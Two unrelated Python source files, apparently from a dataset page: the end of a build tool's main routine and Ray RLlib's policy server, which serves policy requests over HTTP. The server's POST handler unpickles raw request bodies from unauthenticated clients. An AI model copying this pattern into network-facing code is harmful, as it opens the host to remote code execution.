if not args.solution_path:
args.solution_path = os.path.join( ".", "Solutions", args.generate_solution )
if args.generate_solution not in _shared_globals.project_generators:
log.LOG_ERROR( "No solution generator present for solution of type {}".format( args.generate_solution ) )
Exit( 0 )
generator = _shared_globals.project_generators[args.generate_solution]( args.solution_path, args.solution_name, args.solution_args )
generator.WriteProjectFiles( )
log.LOG_BUILD( "Done" )
elif _shared_globals.CleanBuild:
_clean( )
elif args.install:
_install( )
elif args.install_headers:
_installHeaders()
elif args.install_output:
_installOutput()
elif _shared_globals.rebuild:
_clean( )
_make( )
else:
_make( )
#Print out any errors or warnings incurred so the user doesn't have to scroll to see what went wrong
if _shared_globals.warnings:
print("\n")
log.LOG_WARN( "Warnings encountered during build:" )
for warn in _shared_globals.warnings[0:-1]:
log.LOG_WARN( warn )
if _shared_globals.errors:
print("\n")
log.LOG_ERROR( "Errors encountered during build:" )
for error in _shared_globals.errors[0:-1]:
log.LOG_ERROR( error )
if not _shared_globals.build_success:
Exit( 1, False )
else:
Exit( 0, False )
#Regular sys.exit can't be called because we HAVE to reacquore the import lock at exit.
#We stored sys.exit earlier, now we overwrite it to call our wrapper.
sys.exit = Exit
try:
if not hasattr(sys, "runningSphinx"):
_run( )
Exit( 0 )
except Exception as e:
if not imp.lock_held():
imp.acquire_lock()
raise
|
policy_server_input.py
|
import logging
import queue
import threading
import traceback
from http.server import SimpleHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import ray.cloudpickle as pickle
from ray.rllib.offline.input_reader import InputReader
from ray.rllib.env.policy_client import PolicyClient, \
create_embedded_rollout_worker
from ray.rllib.utils.annotations import override, PublicAPI
logger = logging.getLogger(__name__)
logger.setLevel("INFO") # TODO(ekl) this is needed for cartpole_server.py
class PolicyServerInput(ThreadingMixIn, HTTPServer, InputReader):
"""REST policy server that acts as an offline data source.
This launches a multi-threaded server that listens on the specified host
and port to serve policy requests and forward experiences to RLlib. For
high performance experience collection, it implements InputReader.
For an example, run `examples/cartpole_server.py` along
with `examples/cartpole_client.py --inference-mode=local|remote`.
Examples:
>>> pg = PGTrainer(
... env="CartPole-v0", config={
... "input": lambda ioctx:
... PolicyServerInput(ioctx, addr, port),
... "num_workers": 0, # Run just 1 server, in the trainer.
... }
>>> while True:
pg.train()
>>> client = PolicyClient("localhost:9900", inference_mode="local")
>>> eps_id = client.start_episode()
>>> action = client.get_action(eps_id, obs)
>>> ...
>>> client.log_returns(eps_id, reward)
>>> ...
>>> client.log_returns(eps_id, reward)
"""
@PublicAPI
def __init__(self, ioctx, address, port):
"""Create a PolicyServerInput.
This class implements rllib.offline.InputReader, and can be used with
any Trainer by configuring
{"num_workers": 0,
"input": lambda ioctx: PolicyServerInput(ioctx, addr, port)}
Note that by setting num_workers: 0, the trainer will only create one
rollout worker / PolicyServerInput. Clients can connect to the launched
server using rllib.env.PolicyClient.
Args:
ioctx (IOContext): IOContext provided by RLlib.
address (str): Server addr (e.g., "localhost").
port (int): Server port (e.g., 9900).
"""
self.rollout_worker = ioctx.worker
self.samples_queue = queue.Queue()
self.metrics_queue = queue.Queue()
def get_metrics():
completed = []
while True:
try:
completed.append(self.metrics_queue.get_nowait())
except queue.Empty:
break
return completed
# Forwards client-reported rewards directly into the local rollout
# worker. This is a bit of a hack since it is patching the get_metrics
# function of the sampler.
self.rollout_worker.sampler.get_metrics = get_metrics
handler = _make_handler(self.rollout_worker, self.samples_queue,
self.metrics_queue)
HTTPServer.__init__(self, (address, port), handler)
logger.info("")
logger.info("Starting connector server at {}:{}".format(address, port))
logger.info("")
thread = threading.Thread(name="server", target=self.serve_forever)
thread.daemon = True
thread.start()
@override(InputReader)
def next(self):
return self.samples_queue.get()
def _make_handler(rollout_worker, samples_queue, metrics_queue):
# Only used in remote inference mode. We must create a new rollout worker
# then since the original worker doesn't have the env properly wrapped in
# an ExternalEnv interface.
child_rollout_worker = None
inference_thread = None
lock = threading.Lock()
def setup_child_rollout_worker():
nonlocal lock
nonlocal child_rollout_worker
nonlocal inference_thread
with lock:
if child_rollout_worker is None:
(child_rollout_worker,
inference_thread) = create_embedded_rollout_worker(
rollout_worker.creation_args(), report_data)
child_rollout_worker.set_weights(rollout_worker.get_weights())
def report_data(data):
nonlocal child_rollout_worker
batch = data["samples"]
batch.decompress_if_needed()
samples_queue.put(batch)
for rollout_metric in data["metrics"]:
metrics_queue.put(rollout_metric)
if child_rollout_worker is not None:
child_rollout_worker.set_weights(rollout_worker.get_weights(),
rollout_worker.get_global_vars())
class Handler(SimpleHTTPRequestHandler):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
def do_POST(self):
content_len = int(self.headers.get("Content-Length"), 0)
raw_body = self.rfile.read(content_len)
parsed_input = pickle.loads(raw_body)
try:
response = self.execute_command(parsed_input)
self.send_response(200)
self.end_headers()
self.wfile.write(pickle.dumps(response))
except Exception:
self.send_error(500, traceback.format_exc())
def execute_command(self, args):
command = args["command"]
response = {}
# Local inference commands:
if command == PolicyClient.GET_WORKER_ARGS:
logger.info("Sending worker creation args to client.")
response["worker_args"] = rollout_worker.creation_args()
elif command == PolicyClient.GET_WEIGHTS:
logger.info("Sending worker weights to client.")
response["weights"] = rollout_worker.get_weights()
response["global_vars"] = rollout_worker.get_global_vars()
elif command == PolicyClient.REPORT_SAMPLES:
logger.info("Got sample batch of size {} from client.".format(
args["samples"].count))
report_data(args)
# Remote inference commands:
elif command == PolicyClient.START_EPISODE:
setup_child_rollout_worker()
assert inference_thread.is_alive()
response["episode_id"] = (
child_rollout_worker.env.start_episode(
args["episode_id"], args["training_enabled"]))
elif command == PolicyClient.GET_ACTION:
assert inference_thread.is_alive()
response["action"] = child_rollout_worker.env.get_action(
args["episode_id"], args["observation"])
elif command == PolicyClient.LOG_ACTION:
assert inference_thread.is_alive()
child_rollout_worker.env.log_action(
args["episode_id"], args["observation"], args["action"])
elif command == PolicyClient.LOG_RETURNS:
assert inference_thread.is_alive()
child_rollout_worker.env.log_returns(
args["episode_id"], args["reward"], args["info"])
elif command == PolicyClient.END_EPISODE:
assert inference_thread.is_alive()
child_rollout_worker.env.end_episode(args["episode_id"],
args["observation"])
else:
raise ValueError("Unknown command: {}".format(command))
return response
return Handler
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.